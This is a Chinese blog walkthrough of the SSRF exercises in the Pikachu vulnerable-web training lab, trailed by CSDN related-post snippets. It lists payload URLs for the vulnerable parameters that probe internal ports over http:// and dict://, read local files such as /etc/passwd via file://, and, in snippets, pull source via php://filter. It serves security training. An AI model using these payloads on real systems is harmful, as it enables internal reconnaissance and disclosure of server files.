pikachu_ssrf攻略

于 2024-01-23 21:05:51 发布
阅读量649 收藏 7
点赞数 6
分类专栏: 渗透测试漏洞 网络安全 文章标签: ssrf 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46390077/article/details/135787178
版权

ssrf(curl):

打开pikachu靶场:

http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php

发现URL地址最后面是info1.php 猜测一下有没有可能存在info2.php?

尝试修改访问地址: 

因为curl支持很多协议(http,file想,dict等),尝试访问一下:

文件访问(http)

比如说修改url为:?url=http://www.baidu.com,访问百度页面?url=http://www.baidu.com/robots.txt,访问百度文件等

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

端口扫描(http,dict)

使用dict协议可以获取内网主机开放端口相应服务的指纹信息,比如说主机开了http端口

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

读取本地文件(file)

修改url为:?url=file:///etc/passwd,查看文件的内容:

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

ssrf(file_get_content)

首先了解什么是file_get_content的使用:

file_get_contents() 把整个文件读入一个字符串中。
语法:file_get_contents(path,include_path,context,start,max_length)

进行协议测试:

文件读取

读取本地信息?file=file:///c:/1.txt

http协议请求内网资源 

?file=http://127.0.0.1/ssrf/ssrf_curl.php读取文件内容

爱吃银鱼焖蛋
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu之ssrf
weixin_44940180的博客
08-14 2585
一、ssrf(curl) 发现通过url获取资源 正常访问 尝试将参数修改,探测服务器本地的80端口,得到返回信息 或者可以将127.0.0.1更改为内网中其他IP地址 获取hosts文件 探测内网web应用指纹识别 二、ssrf(file_get_content) file_get_contents() 把整个文件读入一个字符串中 获取源码,将其base64解码可获得源码 读取phpinfo.php代码内容显示为base64的形式 ?file=php://filter/read=conve
Pikachu靶场——SSRF 服务端请求伪造
来日可期的博客
09-27 1267
SSRF(Server-Side Request Forgery:服务器端请求伪造)其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,从而导致击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。
PiKachu靶场之SSRF (服务端请求伪造)
angry_program的博客
02-22 2693
概述 SSRF (Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流: 击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又...
皮卡丘(pikachu)SSRF
weixin_44787832的博客
07-24 3548
SSRF(curl) 点击读诗 这里我遇到一个问题,是因为一般默认都是80端口,而我设置了一个8008端口,所以报404的错,这里将后面的127.0.0.1加上“:8008”即可 观察URL,发现可以把URL改成其他的地址和端口 这里我们修改一下端口号 访问 SSRF(file_get_content) 点击读诗 file_get_content可以对本地和远程文件进行读取 比如我们可以在这里读上一首诗,将 http://10.8.220.185:8008/p
pikachu SSRF (Server-Side Request Forgery 服务器端请求伪造)(皮卡丘漏洞平台通关系列)
箭雨镜屋
04-10 2423
一、官方介绍 本节引用内容来自pikachu漏洞平台 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: file
pikachu--SSRF
firecjh的博客
06-10 298
制造恶意的payload去获取后台的PHP源码并将结果转换为base64。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。若没有数据返回或者返回时间延迟较大,就说明3308端口没有开放。SSRF(file_get_content)进入测试页面。发现返回数据库的版本信息,就说明开启了3306端口。)读取本地文件(换成自己电脑的本地文件)读取远程文件(换成自己电脑的远程文件)SSRF(curl)进入测试页面。伪协议文件包含读取源代码,加上。代码执行,看不到源代码内容。编码输出,不然会直接当做。
小破站【pikachu 皮卡丘渗透靶场】 之 SQL注入 自学全套笔记
algae
04-16 4166
sql.txt大纲 数字型测试: $id=$_POST['id'] select 字段1,字段2 from 表名 where id = 1 or 1=1; 字符型测试: $uname=$_GET['username'] select 字段1,字段2 from 表名 where username='kobe' or 1=1#'; 搜索型测试: like '%%' ...
PIKACHU之SSRF
qq_62078839的博客
04-22 1361
概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: file_get_contents() fsockop
PyPI 官网下载 | gym_pikachu_volleyball-0.0.1.tar.gz
01-12
《PyPI官网下载:探索gym_pikachu_volleyball-0.0.1.tar.gz中的Python库知识》 PyPI(Python Package Index)是Python开发者的重要资源库,它提供了无数的开源Python库,便于开发者们下载和安装。在本文中,我们将...
pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_
10-03
【标题】"pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_" 暗示了这是一个与《名侦探皮卡丘》(Detective Pikachu)相关的资源,可能是一部电影或动画的阿拉伯语版本。"arabic" 表明内容是阿拉伯语...
Pikachu_Assistant:这是您的电脑皮卡丘助手!
04-02
Pikachu是使用Python 3.9.1编写的计算机助手,可帮助您找到自己喜欢的应用程序和网站。 这个项目是在学习了4个月的Python之后创建的,因此对于某些部分的代码优化不好,我深表歉意。 我没有提出任何问题,如果您...
pix2pix_edge2pikachu_deeplearnjs_old:pix2pix edge2pikachu在deeplearnjs中
05-12
Deeplearnjs(旧)中的Pix2pix edge2Pikachu 演示: : 鸣谢:该项目基于的 。 我要感谢 , 和对本Github的帮助和建议。 待办事项清单: 使其实时绘制。 缩小模型(现在54.4 MB) 使模型更快(第一个图像约3000毫秒,...
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生创业计划书(4)三篇文件.docx
07-11
大学生创业计划书(4)三篇文件.docx
家具设计作品PPT模板
07-11
【作品名称】:家具设计作品PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
议题:如何提升基础数据与参数设定---二组.xlsx
最新发布
07-11
议题:如何提升基础数据与参数设定---二组
电子保险丝保护芯片,全球前8强生产商排名及市场份额调研数据.pdf
07-11
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。 邮箱:market@qyresearch.com
pikachu中ssrf
09-14
pikachu中的SSRF(Server-Side Request Forgery)漏洞可以通过不受信任的用户输入来构造恶意请求,并导致服务器对外部资源的未授权访问。 在pikachu中,SSRF漏洞主要表现为通过构造URL或使用file_get_contents函数来访问远程资源。文章中提到了两种主要的SSRF漏洞形式:SSRF(URL)和SSRF(file_get_contents)。 在SSRF(URL)中,击者可以利用不受信任的输入构造URL,通过服务器发起对外部资源的请求。这种漏洞可以导致击者访问内部网络、绕过防火墙、获取敏感信息等。 在SSRF(file_get_contents)中,击者可以构造恶意的URL参数,通过file_get_contents函数获取远程资源内容。这种漏洞可以用于读取文件、执行任意代码等。 在pikachu中,可能会存在一个漏洞页面,该页面接受一个名为url的参数,并使用curl库来访问该参数指定的URL。击者可以通过构造恶意的URL参数来利用SSRF漏洞进行击。例如,击者可以构造一个URL参数为'http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php'的请求,从而获取该URL返回的内容。 为了防止SSRF漏洞的利用,开发者应该始终对用户输入进行严格的验证和过滤。可以使用白名单机制来限制可以访问的URL,或者使用特定的URL解析器来解析用户输入的URL,并确保只允许访问合法的URL。此外,还可以对URL参数进行限制,禁止访问内部网络地址和私有IP地址。 总结起来,pikachu中的SSRF漏洞是一种安全风险,击者可以通过构造恶意的URL或使用file_get_contents函数来访问远程资源,并可能导致服务器对外部资源的未授权访问。开发者应该谨慎处理用户输入,进行严格的验证和过滤,以及限制可访问的URL范围,来防止这种漏洞的利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值